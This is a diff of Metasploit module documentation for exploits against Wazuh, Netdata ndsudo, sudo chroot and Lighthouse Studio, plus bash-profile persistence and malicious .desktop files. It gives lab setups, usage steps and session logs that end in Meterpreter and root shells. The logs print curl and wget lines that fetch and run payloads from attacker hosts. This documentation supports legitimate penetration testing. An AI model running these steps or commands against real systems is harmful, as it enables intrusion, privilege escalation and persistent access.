+      - worker-wazuh-var-multigroups:/var/ossec/var/multigroups
+      - worker-wazuh-integrations:/var/ossec/integrations
+      - worker-wazuh-active-response:/var/ossec/active-response/bin
+      - worker-wazuh-agentless:/var/ossec/agentless
+      - worker-wazuh-wodles:/var/ossec/wodles
+      - worker-filebeat-etc:/etc/filebeat
+      - worker-filebeat-var:/var/lib/filebeat
+      - ./config/wazuh_indexer_ssl_certs/root-ca-manager.pem:/etc/ssl/root-ca.pem
+      - ./config/wazuh_indexer_ssl_certs/wazuh.worker.pem:/etc/ssl/filebeat.pem
+      - ./config/wazuh_indexer_ssl_certs/wazuh.worker-key.pem:/etc/ssl/filebeat.key
+      - ./config/wazuh_cluster/wazuh_worker.conf:/wazuh-config-mount/etc/ossec.conf
+
+  wazuh1.indexer:
+    image: wazuh/wazuh-indexer:4.8.2
+    hostname: wazuh1.indexer
+    restart: always
+    ports:
+      - "9200:9200"
+    environment:
+      - "OPENSEARCH_JAVA_OPTS=-Xms1g -Xmx1g"
+      - "bootstrap.memory_lock=true"
+    ulimits:
+      memlock:
+        soft: -1
+        hard: -1
+      nofile:
+        soft: 65536
+        hard: 65536
+    volumes:
+      - wazuh-indexer-data-1:/var/lib/wazuh-indexer
+      - ./config/wazuh_indexer_ssl_certs/root-ca.pem:/usr/share/wazuh-indexer/certs/root-ca.pem
+      - ./config/wazuh_indexer_ssl_certs/wazuh1.indexer-key.pem:/usr/share/wazuh-indexer/certs/wazuh1.indexer.key
+      - ./config/wazuh_indexer_ssl_certs/wazuh1.indexer.pem:/usr/share/wazuh-indexer/certs/wazuh1.indexer.pem
+      - ./config/wazuh_indexer_ssl_certs/admin.pem:/usr/share/wazuh-indexer/certs/admin.pem
+      - ./config/wazuh_indexer_ssl_certs/admin-key.pem:/usr/share/wazuh-indexer/certs/admin-key.pem
+      - ./config/wazuh_indexer/wazuh1.indexer.yml:/usr/share/wazuh-indexer/opensearch.yml
+      - ./config/wazuh_indexer/internal_users.yml:/usr/share/wazuh-indexer/opensearch-security/internal_users.yml
+
+  wazuh2.indexer:
+    image: wazuh/wazuh-indexer:4.8.2
+    hostname: wazuh2.indexer
+    restart: always
+    environment:
+      - "OPENSEARCH_JAVA_OPTS=-Xms1g -Xmx1g"
+      - "bootstrap.memory_lock=true"
+    ulimits:
+      memlock:
+        soft: -1
+        hard: -1
+      nofile:
+        soft: 65536
+        hard: 65536
+    volumes:
+      - wazuh-indexer-data-2:/var/lib/wazuh-indexer
+      - ./config/wazuh_indexer_ssl_certs/root-ca.pem:/usr/share/wazuh-indexer/certs/root-ca.pem
+      - ./config/wazuh_indexer_ssl_certs/wazuh2.indexer-key.pem:/usr/share/wazuh-indexer/certs/wazuh2.indexer.key
+      - ./config/wazuh_indexer_ssl_certs/wazuh2.indexer.pem:/usr/share/wazuh-indexer/certs/wazuh2.indexer.pem
+      - ./config/wazuh_indexer/wazuh2.indexer.yml:/usr/share/wazuh-indexer/opensearch.yml
+      - ./config/wazuh_indexer/internal_users.yml:/usr/share/wazuh-indexer/opensearch-security/internal_users.yml
+
+  wazuh3.indexer:
+    image: wazuh/wazuh-indexer:4.8.2
+    hostname: wazuh3.indexer
+    restart: always
+    environment:
+      - "OPENSEARCH_JAVA_OPTS=-Xms1g -Xmx1g"
+      - "bootstrap.memory_lock=true"
+    ulimits:
+      memlock:
+        soft: -1
+        hard: -1
+      nofile:
+        soft: 65536
+        hard: 65536
+    volumes:
+      - wazuh-indexer-data-3:/var/lib/wazuh-indexer
+      - ./config/wazuh_indexer_ssl_certs/root-ca.pem:/usr/share/wazuh-indexer/certs/root-ca.pem
+      - ./config/wazuh_indexer_ssl_certs/wazuh3.indexer-key.pem:/usr/share/wazuh-indexer/certs/wazuh3.indexer.key
+      - ./config/wazuh_indexer_ssl_certs/wazuh3.indexer.pem:/usr/share/wazuh-indexer/certs/wazuh3.indexer.pem
+      - ./config/wazuh_indexer/wazuh3.indexer.yml:/usr/share/wazuh-indexer/opensearch.yml
+      - ./config/wazuh_indexer/internal_users.yml:/usr/share/wazuh-indexer/opensearch-security/internal_users.yml
+
+  wazuh.dashboard:
+    image: wazuh/wazuh-dashboard:4.8.2
+    hostname: wazuh.dashboard
+    restart: always
+    ports:
+      - 443:5601
+    environment:
+      - OPENSEARCH_HOSTS="https://wazuh1.indexer:9200"
+      - WAZUH_API_URL="https://wazuh.master"
+      - API_USERNAME=wazuh-wui
+      - API_PASSWORD=MyS3cr37P450r.*-
+      - DASHBOARD_USERNAME=kibanaserver
+      - DASHBOARD_PASSWORD=kibanaserver
+    volumes:
+      - ./config/wazuh_indexer_ssl_certs/wazuh.dashboard.pem:/usr/share/wazuh-dashboard/certs/wazuh-dashboard.pem
+      - ./config/wazuh_indexer_ssl_certs/wazuh.dashboard-key.pem:/usr/share/wazuh-dashboard/certs/wazuh-dashboard-key.pem
+      - ./config/wazuh_indexer_ssl_certs/root-ca.pem:/usr/share/wazuh-dashboard/certs/root-ca.pem
+      - ./config/wazuh_dashboard/opensearch_dashboards.yml:/usr/share/wazuh-dashboard/config/opensearch_dashboards.yml
+      - ./config/wazuh_dashboard/wazuh.yml:/usr/share/wazuh-dashboard/data/wazuh/config/wazuh.yml
+      - wazuh-dashboard-config:/usr/share/wazuh-dashboard/data/wazuh/config
+      - wazuh-dashboard-custom:/usr/share/wazuh-dashboard/plugins/wazuh/public/assets/custom
+    depends_on:
+      - wazuh1.indexer
+    links:
+      - wazuh1.indexer:wazuh1.indexer
+      - wazuh.master:wazuh.master
+
+  nginx:
+    image: nginx:stable
+    hostname: nginx
+    restart: always
+    ports:
+      - "1514:1514"
+    depends_on:
+      - wazuh.master
+      - wazuh.worker
+      - wazuh.dashboard
+    links:
+      - wazuh.master:wazuh.master
+      - wazuh.worker:wazuh.worker
+      - wazuh.dashboard:wazuh.dashboard
+    volumes:
+      - ./config/nginx/nginx.conf:/etc/nginx/nginx.conf:ro
+
+volumes:
+  master-wazuh-api-configuration:
+  master-wazuh-etc:
+  master-wazuh-logs:
+  master-wazuh-queue:
+  master-wazuh-var-multigroups:
+  master-wazuh-integrations:
+  master-wazuh-active-response:
+  master-wazuh-agentless:
+  master-wazuh-wodles:
+  master-filebeat-etc:
+  master-filebeat-var:
+  worker-wazuh-api-configuration:
+  worker-wazuh-etc:
+  worker-wazuh-logs:
+  worker-wazuh-queue:
+  worker-wazuh-var-multigroups:
+  worker-wazuh-integrations:
+  worker-wazuh-active-response:
+  worker-wazuh-agentless:
+  worker-wazuh-wodles:
+  worker-filebeat-etc:
+  worker-filebeat-var:
+  wazuh-indexer-data-1:
+  wazuh-indexer-data-2:
+  wazuh-indexer-data-3:
+  wazuh-dashboard-config:
+  wazuh-dashboard-custom:
+```
+* Run following command `docker-compose up -d` to install and run the Wazuh server cluster environment.
+* Your Wazuh server should be accessible on `https://localhost` with an active Wazuh server cluster running.
+* You can bring down the environment for a fresh start with the command `docker-compose down`.
+
+You are now ready to test the module.
+
+**IMPORTANT NOTE:**
+This vulnerability can only be triggered in a Wazuh multi-node cluster configuration, because it needs the distributed API function.
+It is important to understand that the worker-server port (`55000`) should be exposed to the outside world in order to trigger
+this vulnerability. In the above lab setup, it is exposed on port `56000` (see the `docker-compose.yml` file)
+Using it directly on the master-server port (`55000`) will not work because the DAPI request is not leveraged in this case, hence
+the vulnerable code will not be triggered.
+
+## Verification Steps
+- [ ] Start `msfconsole`
+- [ ] `use exploit/linux/http/wazuh_auth_rce_cve_2025_24016`
+- [ ] `set rhosts <ip-target>`
+- [ ] `set rport <port>`
+- [ ] `set lhost <attacker-ip>`
+- [ ] `set target <0=Unix/Linux Command>`
+- [ ] `exploit`
+
+you should get a `reverse shell` or `Meterpreter` session depending on the `payload` and `target` settings.
+
+## Options
+**API Credentials:**
+`API_PWD` Wazuh API password (MyS3cr37P450r.*-)
+`API_USER` Wazuh API user (wazuh-wui)
+
+## Scenarios
+### Wazuh server 4.8.2 on Docker Desktop
+```msf
+msf6 exploit(linux/http/wazuh_auth_rce_cve_2025_24016) > options
+
+Module options (exploit/linux/http/wazuh_auth_rce_cve_2025_24016):
+
+   Name       Current Setting   Required  Description
+   ----       ---------------   --------  -----------
+   API_PWD    MyS3cr37P450r.*-  yes       Wazuh API password
+   API_USER   wazuh-wui         yes       Wazuh API user
+   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, socks5, http,
+                                           socks5h
+   RHOSTS     192.168.201.85    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT      56000             yes       The target port (TCP)
+   SSL        true              no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                 yes       Path to the wazuh manager
+   VHOST                        no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
+
+   Name            Current Setting  Required  Description
+   ----            ---------------  --------  -----------
+   FETCH_COMMAND   CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE    false            yes       Attempt to delete the binary after execution
+   FETCH_FILELESS  none             yes       Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python
+                                               variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
+   FETCH_SRVHOST                    no        Local IP to use for serving payload
+   FETCH_SRVPORT   8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                    no        Local URI to use for serving payload
+   LHOST           192.168.201.10   yes       The listen address (an interface may be specified)
+   LPORT           4444             yes       The listen port
+
+
+   When FETCH_COMMAND is one of CURL,WGET:
+
+   Name        Current Setting  Required  Description
+   ----        ---------------  --------  -----------
+   FETCH_PIPE  false            yes       Host both the binary payload and the command so it can be piped directly to the shell.
+
+
+   When FETCH_FILELESS is none:
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_FILENAME      WqYFaNqq         no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_WRITABLE_DIR  /tmp             yes       Remote writable dir to store payload; cannot contain spaces
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Unix/Linux Command
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/wazuh_auth_rce_cve_2025_24016) > rexploit
+[*] Reloading module...
+[*] Started reverse TCP handler on 192.168.201.10:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Wazuh version 4.8.2
+[*] Executing Unix/Linux Command for cmd/linux/http/x64/meterpreter/reverse_tcp
+[*] Sending stage (3090404 bytes) to 192.168.201.85
+[*] Meterpreter session 2 opened (192.168.201.10:4444 -> 192.168.201.85:58215) at 2025-07-16 08:14:53 +0000
+
+meterpreter > getuid
+Server username: wazuh
+meterpreter > sysinfo
+Computer     : wazuh.master
+OS           :  (Linux 6.10.14-linuxkit)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > pwd
+/
+meterpreter >
+```
+
+## Limitations
+This module works only on a Wazuh Server multi-node cluster configuration.
@@ -1,50 +0,0 @@
-## Description
-
-  This module establishes persistence via the Linux Bash profile method.
-  This module makes two changes to the target system.
-  First, the module writes a payload to a directory (`/var/temp/` by default).
-  Second, the module writes a payload execution trigger to the Bash profile (`~/.bashrc` by default).
-  The persistent payload is executed whenever the victim user opens a Bash terminal.
-
-## Vulnerable Application
-
-  This module has been tested successfully on:
-
-  * Ubuntu 19 (x86_64) running GNU bash, version 5.0.3(1)-release
-
-## Verification Steps
-
-  1. Start `msfconsole`
-  2. Get a Meterpreter session
-  3. `use exploit/linux/local/bash_profile_persistence`
-  4. `set SESSION [SESSION]`
-  5. `run`
-  6. On victim, open a new Bash terminal
-  7. You should get a new session with the permissions of the exploited user account
-
-## Options
-
-  **BASH_PROFILE**
-
-  The path to the target Bash profile. (default: `~/.bashrc`)
-
-  **PAYLOAD_DIR**
-
-  A writable directory file system path. (default: `/var/tmp`)
-
-## Scenarios
-
-```
-msf > use exploit/linux/local/bash_profile_persistence
-msf exploit(linux/local/bash_profile_persistence) > set SESSION 1
-msf exploit(linux/local/bash_profile_persistence) > exploit
-
-[*] Bash profile exists: /home/user/.bashrc
-[*] Bash profile is writable: /home/user/.bashrc
-[*] Created backup Bash profile: /root/.msf4/logs/persistence/192.168.1.191_20191128.130945_Bash_Profile.backup
-[*] Writing '/var/tmp/IgHypGLMglheQ' (126 bytes) ...
-[+] Wrote payload trigger to Bash profile
-[!] Payload will be triggered when target opens a Bash terminal
-[!] Don't forget to start your handler:
-[!] msf> handler -H 0.0.0.0 -P 4444 -p cmd/unix/reverse_python
-```
@@ -0,0 +1,60 @@
+## Vulnerable Application
+
+The `ndsudo` is a tool shipped with Netdata Agent. Versions v1.45.0 and below contain a vulnerability, which allows an attacker to gain privilege escalation using the `ndsudo` binary. The vulnerability is an untrusted search path. When searching for additional binary files, such as `nvme`, an attacker can create a malicious binary with same name and add the directory of this binary into the `$PATH` variable. The `ndsudo` will trust the first occurrence of this binary and execute it.
+
+Installation steps:
+
+1. `sudo apt  install cmake libelf-dev git bison flex build-essential libssl-dev pkg-config liblz4-dev libzstd-dev libbrotli-dev uuid-dev libuv1-dev`
+1. `wget https://github.com/netdata/netdata-nightlies/releases/download/v1.45.0-8-nightly/netdata-latest.tar.gz`
+1. `gunzip netdata-latest.tar.gz`
+1. `tar -xf netdata-latest.tar`
+1. `cd netdata-v1.45.0-8-g5803c7766/`
+1. `sudo ./netdata-installer.sh`
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Receive a session
+1. Do: `use exploit/linux/local/ndsudo_cve_2024_32019`
+1. Do: `set session [session number]`
+1. Do: `run`
+1. Get root shell/meterpreter session
+
+## Options
+
+
+### WritableDir
+
+A path where malicious `nvme` binary will be stored. This path will be later prepended to `$PATH` variable to achieve privilege escalation.
+
+### NdsudoPath
+
+The path to the `ndsudo` binary.
+
+
+## Scenarios
+
+```
+msf exploit(linux/local/ndsudo_cve_2024_32019) > run verbose=true
+[*] Started reverse TCP handler on 192.168.3.7:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Vulnerable binary detected
+[*] Creating malicious file at /tmp/nvme
+[*] Writing '/tmp/nvme' (250 bytes) ...
+[*] Executing..
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3090404 bytes) to 10.5.134.200
+[+] Deleted /tmp/nvme
+[*] Meterpreter session 3 opened (192.168.3.7:4444 -> 10.5.134.200:53172) at 2025-08-11 11:05:24 +0200
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : 10.5.134.200
+OS           : Ubuntu 20.04 (Linux 5.13.0-1021-oem)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```
@@ -0,0 +1,94 @@
+## Vulnerable Application
+
+
+Sudo before version 1.9.14-1.9.17p1 allows user to use `chroot` option, when executing command. The option is intended to run a command with user-selected root directory (if sudoers file allow it). Change in version 1.9.14 allows resolving paths via `chroot` using user-specified root directory when sudoers is still evaluating. This allows the attacker to trick Sudo into loading arbitrary shared object. As target shared object, Name Service Switch (NSS) operations are trigged before resolving sudoers, but after running `chroot` syscall. The module requires existing session and requires compiler on target machine (e.g. `gcc`). 
+
+## Installation
+
+1. Create `Dockerfile`:
+```
+# ----- Dockerfile -----
+FROM ubuntu:24.04
+
+ENV DEBIAN_FRONTEND=noninteractive
+
+RUN apt-get update && \
+    apt-get install -y build-essential wget libpam0g-dev libselinux1-dev zlib1g-dev \
+                       pkg-config libssl-dev git ca-certificates && \
+    rm -rf /var/lib/apt/lists/*
+
+WORKDIR /opt
+RUN wget https://www.sudo.ws/dist/sudo-1.9.16p2.tar.gz && \
+    tar xzf sudo-1.9.16p2.tar.gz && \
+    cd sudo-1.9.16p2 && \
+    ./configure --disable-gcrypt --prefix=/usr && make && make install
+
+RUN useradd -m -s /bin/bash msfuser
+
+USER msfuser
+WORKDIR /home/msfuser
+
+CMD ["/bin/bash"]
+```
+1. `docker build -t sudo-chroot .`
+1. `docker run -it --rm --privileged sudo-chroot`
+
+
+## Verification Steps
+
+
+1. Start msfconsole
+2. Get existing session to low-privileged user
+3. Do: `use linux/local/sudo_chroot_cve_2025_32463`
+4. Set target payload
+5. Do: `set lhost [attacker IP address]`
+6. Do: `set lport [attacker port]`
+7. Do: `run`
+
+## Options
+
+### COMPILE
+
+Option setting if compile target payload on the target.
+
+### COMPILER
+
+Option setting the compiler to compile target payload.
+
+
+## Scenarios
+
+```
+msf6 exploit(linux/local/sudo_chroot_cve_2025_32463) > run verbose=true 
+[*] Command to run on remote host: curl -so ./YoGpAgWbO http://192.168.168.128:8080/Q7JGOkCYlO14PhxIQeJRIQ;chmod +x ./YoGpAgWbO;./YoGpAgWbO&
+[*] Fetch handler listening on 192.168.168.128:8080
+[*] HTTP server started
+[*] Adding resource /Q7JGOkCYlO14PhxIQeJRIQ
+[*] Started reverse TCP handler on 192.168.168.128:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Running version 1.9.16.2
+[*] Writing '/tmp/Xw1XwkTPC' (117 bytes) ...
+[*] Max line length is 65537
+[*] Writing 117 bytes in 1 chunks of 420 bytes (octal-encoded), using printf
+[*] Creating directory /tmp/ugJjJFSc9q
+[*] /tmp/ugJjJFSc9q created
+[*] Max line length is 65537
+[*] Writing 216 bytes in 1 chunks of 763 bytes (octal-encoded), using printf
+[*] Client 192.168.168.140 requested /Q7JGOkCYlO14PhxIQeJRIQ
+[*] Sending payload to 192.168.168.140 (curl/8.14.1)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Launching exploit...
+[*] Sending stage (3090404 bytes) to 192.168.168.140
+[+] Deleted /tmp/Xw1XwkTPC
+[+] Deleted /tmp/ugJjJFSc9q
+[*] Meterpreter session 10 opened (192.168.168.128:4444 -> 192.168.168.140:41672) at 2025-07-10 16:12:58 +0200
+
+meterpreter > sysinfo 
+Computer     : kali.kali
+OS           : Debian  (Linux 6.12.25-amd64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > getuid
+Server username: root
+```
@@ -0,0 +1,111 @@
+## Vulnerable Application
+
+This module writes an execution trigger to the target's Bash profile.
+The execution trigger executes a call back payload whenever the target
+user opens a Bash terminal.
+
+Verified on Ubuntu 22.04 and 18.04 desktop with Gnome
+
+## Verification Steps
+
+1. Start `msfconsole`
+2. Get a Meterpreter session
+3. `use exploit/linux/persistence/bash_profile`
+4. `set SESSION [SESSION]`
+5. `run`
+6. On victim, open a new Bash terminal
+7. You should get a new session with the permissions of the exploited user account
+
+## Options
+
+### BASH_PROFILE
+
+The path to the target Bash profile. Defaults to `.bashrc`
+
+### PAYLOAD_NAME
+
+Name of the payload file. Defaults to random
+
+## Scenarios
+
+### Ubuntu 18.04.3
+
+Initial access vector via web delivery
+
+```
+[*] Processing /root/.msf4/msfconsole.rc for ERB directives.
+resource (/root/.msf4/msfconsole.rc)> setg verbose true
+verbose => true
+resource (/root/.msf4/msfconsole.rc)> setg lhost 111.111.1.111
+lhost => 111.111.1.111
+resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
+[*] Using configured payload python/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> set srvport 8181
+srvport => 8181
+resource (/root/.msf4/msfconsole.rc)> set target 7
+target => 7
+resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp
+payload => linux/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> set lport 4545
+lport => 4545
+resource (/root/.msf4/msfconsole.rc)> set URIPATH l
+URIPATH => l
+resource (/root/.msf4/msfconsole.rc)> run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+[*] Starting persistent handler(s)...
+[*] Started reverse TCP handler on 111.111.1.111:4545 
+[*] Using URL: http://111.111.1.111:8181/l
+[*] Server started.
+[*] Run the following command on the target machine:
+wget -qO O2XZweCh --no-check-certificate http://111.111.1.111:8181/l; chmod +x O2XZweCh; ./O2XZweCh& disown
+[msf](Jobs:1 Agents:0) exploit(multi/script/web_delivery) > [*] 222.222.2.222    web_delivery - Delivering Payload (250 bytes)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 222.222.2.222
+[*] Meterpreter session 1 opened (111.111.1.111:4545 -> 222.222.2.222:44878) at 2025-02-06 21:11:39 -0500
+```
+
+Persistence
+
+```
+[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > use exploit/linux/persistence/bash_profile 
+[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
+[msf](Jobs:1 Agents:1) exploit(linux/persistence/bash_profile) > set session 1
+session => 1
+[msf](Jobs:1 Agents:1) exploit(linux/persistence/bash_profile) > exploit
+[*] Command to run on remote host: curl -so ./QfTygMjF http://111.111.1.111:8080/Hg3DGEu9GqlWD06kh4AzFg;chmod +x ./QfTygMjF;./QfTygMjF&
+[*] Exploit running as background job 1.
+[*] Exploit completed, but no session was created.
+[msf](Jobs:2 Agents:1) exploit(linux/persistence/bash_profile) > 
+[*] Fetch handler listening on 111.111.1.111:8080
+[*] HTTP server started
+[*] Adding resource /Hg3DGEu9GqlWD06kh4AzFg
+[*] Started reverse TCP handler on 111.111.1.111:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] Bash profile exists: /home/ubuntu/.bashrc
+[+] Bash profile is writable: /home/ubuntu/.bashrc
+[!] The service is running, but could not be validated. Bash profile exists and is writable: /home/ubuntu/.bashrc
+[*] Created backup Bash profile: /root/.msf4/loot/20250206211215_default_222.222.2.222_desktop..bashrc_080965.txt
+[*] Writing '/tmp/BfkldKp4' (100 bytes) ...
+[*] Created Bash profile persistence
+[+] Payload will be triggered when target opens a Bash terminal
+[*] Meterpreter-compatible Cleaup RC file: /root/.msf4/logs/persistence/ubuntu18desktop.local_20250206.1216/ubuntu18desktop.local_20250206.1216.rc
+```
+On the remote host open `/bin/bash`
+
+```
+[*] Client 222.222.2.222 requested /Hg3DGEu9GqlWD06kh4AzFg
+[*] Sending payload to 222.222.2.222 (curl/7.58.0)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 222.222.2.222
+[*] Meterpreter session 2 opened (111.111.1.111:4444 -> 222.222.2.222:40990) at 2025-02-06 21:12:21 -0500
+[msf](Jobs:2 Agents:2) exploit(linux/persistence/bash_profile) > sessions -i 2
+[*] Starting interaction with 2...
+(Meterpreter 2)(/tmp) > sysinfo
+Computer     : ubuntu18desktop.local
+OS           : Ubuntu 18.04 (Linux 5.4.0-150-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+(Meterpreter 2)(/tmp) > 
+```
@@ -0,0 +1,122 @@
+## Vulnerable Application
+
+This module creates a malicious XDG Desktop (.desktop) file.
+
+On most modern systems, desktop files are not trusted by default.
+The user will receive a warning prompt that the file is not trusted
+when running the file, but may choose to run the file anyway.
+
+The default file manager applications in some desktop environments
+may impose more strict execution requirements by prompting the user
+to set the file as executable and/or marking the file as trusted
+before the file can be executed.
+
+
+## Options
+
+### FILENAME
+
+The desktop file name. (Default: `msf.desktop`)
+
+### APPLICATION_NAME
+
+The application name. Some file managers will display this name instead of the file name. (Default: random)
+
+
+## Advanced Options
+
+### PrependNewLines
+
+Prepend new lines before the payload. (Default: `100`)
+
+
+## Verification Steps
+
+On the Metasploit host:
+
+1. Start msfconsole
+1. Do: `use exploit/multi/fileformat/xdg_desktop`
+1. Do: `set filename [filename.desktop]`
+1. Do: `set payload [payload]`
+1. Do: `set lhost [lhost]`
+1. Do: `set lport [lport]`
+1. Do: `run`
+1. Do: `handler -p [payload] -P [lport] -H [lhost]`
+
+On the target machine:
+
+1. Open the `msf.desktop` file
+1. If prompted, choose "Launch Anyway"
+
+
+## Scenarios
+
+### Ubuntu MATE 24.04.2 (x86_64)
+
+```
+msf > use exploit/multi/fileformat/xdg_desktop
+[*] No payload configured, defaulting to cmd/linux/http/aarch64/meterpreter/reverse_tcp
+msf exploit(multi/fileformat/xdg_desktop) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp
+payload => cmd/linux/http/x64/meterpreter/reverse_tcp
+msf exploit(multi/fileformat/xdg_desktop) > set lhost 192.168.200.130
+lhost => 192.168.200.130
+msf exploit(multi/fileformat/xdg_desktop) > set lport 4444
+lport => 4444
+msf exploit(multi/fileformat/xdg_desktop) > set FETCH_COMMAND wget
+FETCH_COMMAND => WGET
+msf exploit(multi/fileformat/xdg_desktop) > run
+[+] msf.desktop stored at /root/.msf4/local/msf.desktop
+msf exploit(multi/fileformat/xdg_desktop) > handler -p cmd/linux/http/x64/meterpreter/reverse_tcp -P 4444 -H 192.168.200.130
+[*] Payload handler running as background job 0.
+
+[*] Started reverse TCP handler on 192.168.200.130:4444 
+msf exploit(multi/fileformat/xdg_desktop) > 
+[*] Sending stage (3090404 bytes) to 192.168.200.193
+[*] Meterpreter session 1 opened (192.168.200.130:4444 -> 192.168.200.193:52462) at 2025-07-29 03:29:10 -0400
+
+msf exploit(multi/fileformat/xdg_desktop) > sessions -i -1
+[*] Starting interaction with 1...
+
+meterpreter > sysinfo
+Computer     : linuxmint-mate-24-04.2-desktop-amd64
+OS           : Ubuntu 24.04 (Linux 6.14.0-24-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
+```
+
+### Linux Mint 22.1 (MATE) (x86_64)
+
+```
+msf > use exploit/multi/fileformat/xdg_desktop 
+[*] No payload configured, defaulting to cmd/linux/http/aarch64/meterpreter/reverse_tcp
+msf exploit(multi/fileformat/xdg_desktop) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp 
+payload => cmd/linux/http/x64/meterpreter/reverse_tcp
+msf exploit(multi/fileformat/xdg_desktop) > set lhost 192.168.200.130
+lhost => 192.168.200.130
+msf exploit(multi/fileformat/xdg_desktop) > set lport 4444
+lport => 4444
+msf exploit(multi/fileformat/xdg_desktop) > set FETCH_COMMAND wget
+FETCH_COMMAND => WGET
+msf exploit(multi/fileformat/xdg_desktop) > run
+[+] msf.desktop stored at /root/.msf4/local/msf.desktop
+msf exploit(multi/fileformat/xdg_desktop) > handler -p cmd/linux/http/x64/meterpreter/reverse_tcp -P 4444 -H 192.168.200.130
+[*] Payload handler running as background job 0.
+
+[*] Started reverse TCP handler on 192.168.200.130:4444 
+msf exploit(multi/fileformat/xdg_desktop) > 
+[*] Sending stage (3090404 bytes) to 192.168.200.189
+[*] Meterpreter session 1 opened (192.168.200.130:4444 -> 192.168.200.189:35162) at 2025-07-29 02:45:34 -0400
+
+msf exploit(multi/fileformat/xdg_desktop) > sessions -i -1
+[*] Starting interaction with 1...
+
+meterpreter > sysinfo 
+Computer     : 192.168.200.189
+OS           : LinuxMint 22.1 (Linux 6.8.0-51-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
+```
@@ -0,0 +1,414 @@
+## Vulnerable Application
+
+This module exploits a template injection vulnerability in the
+Sawtooth Software Lighthouse Studio's `ciwweb.pl` web application.
+The application fails to properly sanitize user input within survey templates,
+allowing unauthenticated attackers to inject and execute arbitrary Perl commands
+on the target system.
+
+This vulnerability affects Lighthouse Studio versions prior to 9.16.14.
+Successful exploitation may result in remote code execution under the privileges
+of the web server, potentially exposing sensitive data or disrupting survey operations.
+
+An attacker can execute arbitrary system commands in the context of the user running the web server.
+
+## STUDYNAME parameter
+
+The `STUDYNAME` parameter must be set manually if the server responds with the error `Cannot find default studyname`, which occurs when the `hid_studyname` parameter is not provided.
+The `hid_studyname` parameter serves as the identifier of the survey or test being executed.
+
+## Testing
+
+### Setup a Linux Server to Host the Lighhouse Survey
+
+To set up a test environment:
+
+1. Download and Install Ubuntu 18.04.6 LTS
+
+Download the ISO from the official Ubuntu archive:
+https://releases.ubuntu.com/18.04/
+
+2. Update Package Index
+
+After installation, update your system’s package list:
+
+```
+sudo apt update
+```
+
+3. Install MySQL 5.7
+
+Install MySQL 5.7, the target version:
+
+```
+sudo apt -y install mysql-server-5.7
+```
+
+Once installed, MySQL should start automatically. If not, run:
+
+```
+sudo systemctl start mysql
+```
+
+4. Install Perl Modules
+
+Install core build tools and the cpanm Perl module manager:
+
+```
+sudo apt -y install build-essential cpanminus
+```
+
+Install required Perl modules with specific versions:
+
+```
+sudo cpanm DBI@1.642
+sudo cpanm DBD::mysql@4.050
+sudo cpanm JSON::PP@4.00
+sudo cpanm DateTime@1.06 
+```
+
+```
+sudo apt install libdbd-mysql-perl
+```
+
+5. Install and Start Apache Web Server
+
+```
+sudo apt install -y apache2
+sudo systemctl start apache2
+sudo systemctl enable apache2
+```
+
+Apache will now be running and set to start automatically on boot.
+
+6. Enable CGI and Perl Support in Apache
+
+Install the required Apache modules and enable CGI execution:
+
+```
+sudo apt install -y libapache2-mod-perl2
+sudo a2enmod perl
+sudo a2enmod cgi
+sudo systemctl restart apache2
+```
+
+This allows Perl CGI scripts to be executed from the web server.
+
+7. Install and Start FTP Server (vsftpd)
+
+```
+sudo apt install -y vsftpd
+sudo systemctl start vsftpd
+sudo systemctl enable vsftpd
+```
+
+8. Configure FTP Access
+
+Create FTP User
+
+```
+sudo adduser ftpuser
+```
+
+Set Directory Permissions
+
+```
+sudo chown -R ftpuser:ftpuser /var/www/html
+```
+
+Edit FTP Configuration.
+Open the config file:
+
+```
+sudo nano /etc/vsftpd.conf
+```
+
+Update or add the following settings:
+
+```
+listen=YES
+listen_ipv6=NO
+
+anonymous_enable=NO
+local_enable=YES
